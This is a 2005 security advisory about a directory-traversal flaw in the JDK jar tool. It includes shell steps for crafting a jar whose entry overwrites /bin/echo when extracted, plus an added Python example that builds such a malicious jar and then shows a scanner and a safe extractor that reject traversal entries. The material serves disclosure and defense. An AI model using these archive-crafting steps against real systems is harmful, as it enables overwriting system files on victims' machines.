- ------------------------------------------------------------------
  7a69ezine Advisories                                    7a69Adv#23
- ------------------------------------------------------------------
  http://www.7a69ezine.org                              [01/04/2005]
- ------------------------------------------------------------------

  Title:    Jar tool directory traversal vulnerability
  Author:   Pluf - <pluf@xxxxxxxxxxxxx>
  Remote:   no
  Exploit:  yes
  Severity: Medium-High

- ------------------------------------------------------------------

I. Introduction.

Jar is a Java archiving and compression tool that ships with many Java development kits. It was designed mainly to package Java applets or applications into a single archive.

II. Description.

The jar tool does not check whether the names of the entries it extracts contain the string "../". An attacker can therefore craft a malicious jar file whose entry names walk out of the extraction directory, and extracting it overwrites arbitrary files on the filesystem with the privileges of the user running jar.

III. Affected Software.

The following Java development kits have been tested and contain the vulnerability; other kits and/or platforms may be affected as well:

 * SUN:
   Sun's J2SE Development Kit 1.5.0 (Solaris, Windows and Linux versions)
   Sun's J2SE Development Kit 1.4.2 (Solaris, Windows and Linux versions)
 * IBM:
   IBM Java Development Kit 1.4.2 Linux
 * BEA:
   BEA WebLogic's J2SE Development Kit, version 1.5.0 (Linux and Windows versions)
 * BLACKDOWN:
   Blackdown Java Development Kit 1.4.2 Linux

IV. Exploit.

A malicious jar file can be created as follows:

 java4fun# echo hi
 hi
 java4fun# jar cvf trash.jar *.class ..o..o..o..o..o..o..obinoecho
 java4fun# ht trash.jar                    (change each 'o' to '/')
 java4fun# jar xvf trash.jar               (no overwrite confirmation message)
 java4fun# echo hi
 hi, you've just infected yourself!!!

The jar tool stores the entry name verbatim, so editing the stored name inside trash.jar with the ht hex editor turns "..o..o..o..o..o..o..obinoecho" into "../../../../../../../bin/echo". When "jar xvf" unpacks the archive it follows that path and writes the entry over /bin/echo (here as root) without any warning.

V. Patch.

Not available. Use unzip instead of jar.

VI. Timeline.

 23/03/2005 Bug discovered.
 28/03/2005 Mail sent to vendors.
 28/03/2005 Sun response.
 02/04/2005 Mail sent to vendors (second try).
 09/04/2005 Advisory released.

VII. Extra data.

You can find more 7a69ezine advisories at the following link: http://www.7a69ezine.org/avisos/propios [Spanish]
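The following is an added example, not code from the advisory or from any JDK. It reproduces sections II and IV without a hex editor: a jar is an ordinary zip archive and the entry name is just a string in the zip header, so Python's zipfile can write "../../../../../../../bin/echo" directly (zipfile keeps ".." components in stored names). It then shows the check that the vulnerable jar tool skipped, as an entry scanner and as an extractor that refuses the whole archive if any entry would resolve outside the destination. All archive contents, the stub class bytes and the replacement echo script are constructed here for the demonstration.

```python
"""Added example (not the advisory's code): build a jar whose entry name
carries '../' components, detect such entries, and extract only after each
target path has been confirmed to stay inside the destination directory.
A jar is an ordinary zip archive, so the entry name is just a string in the
zip header; the advisory patched that string with a hex editor, here
zipfile writes it directly.  All archive contents are constructed here."""
import io
import os
import tempfile
import zipfile


def build_jar(entries: dict) -> bytes:
    """Return the bytes of a zip/jar holding the given {name: data} entries.
    zipfile.ZipInfo keeps '..' components in the stored name untouched."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as jar:
        for name, data in entries.items():
            jar.writestr(name, data)
    return buf.getvalue()


def build_malicious_jar(depth: int = 7) -> bytes:
    """The advisory's trash.jar: a harmless class entry plus an entry named
    ../../../../../../../bin/echo that would overwrite /bin/echo when the
    archive is unpacked from a directory `depth` levels below /."""
    return build_jar({
        "META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\n",
        "Hello.class": b"\xca\xfe\xba\xbe",  # constructed stub, not a real class
        "../" * depth + "bin/echo": b"#!/bin/sh\necho hi, you've just infected yourself!!!\n",
    })


def unsafe_entries(jar_bytes: bytes) -> list:
    """Names that escape the extraction directory: absolute paths, Windows
    drive prefixes, backslash separators hiding a '..', or any '..' path
    component.  This is the check the vulnerable jar tool did not make."""
    bad = []
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for name in jar.namelist():
            norm = name.replace("\\", "/")
            parts = norm.split("/")
            if norm.startswith("/") or (len(norm) > 1 and norm[1] == ":") or ".." in parts:
                bad.append(name)
    return bad


def safe_extract(jar_bytes: bytes, dest: str) -> list:
    """Extract into `dest`, refusing the whole archive if any entry would
    resolve outside it.  Returns the entry names written, in order."""
    dest_real = os.path.realpath(dest)
    written = []
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        infos = jar.infolist()
        # Check every entry before writing anything, so a bad entry late in
        # the archive is not reached after earlier entries were already unpacked.
        for info in infos:
            target = os.path.realpath(os.path.join(dest_real, info.filename))
            if os.path.commonpath([dest_real, target]) != dest_real:
                raise ValueError("refusing traversal entry: %r" % info.filename)
        for info in infos:
            target = os.path.join(dest_real, info.filename)
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
            else:
                os.makedirs(os.path.dirname(target), exist_ok=True)
                with open(target, "wb") as fh:
                    fh.write(jar.read(info))
            written.append(info.filename)
    return written


def demo() -> tuple:
    """Run a malicious and a clean jar through the scanner and the extractor.
    Returns (bad names in the malicious jar, names written from the clean jar,
    whether the malicious jar was refused)."""
    malicious = build_malicious_jar()
    clean = build_jar({"META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\n",
                       "Hello.class": b"\xca\xfe\xba\xbe"})
    with tempfile.TemporaryDirectory() as tmp:
        refused = False
        try:
            safe_extract(malicious, tmp)
        except ValueError:
            refused = True
        written = safe_extract(clean, tmp)
    return unsafe_entries(malicious), written, refused


if __name__ == "__main__":
    print(demo())
```

Running the script lists the single traversal entry, confirms the clean jar extracts normally and the malicious one is refused outright. The scanner alone is enough to triage an untrusted jar before handing it to "jar xvf"; the extractor resolves each target with realpath so that a ".." hidden behind a symlinked directory is also caught. Info-ZIP's unzip, which the advisory recommends as the workaround, strips the "../" components and prints a warning rather than following them.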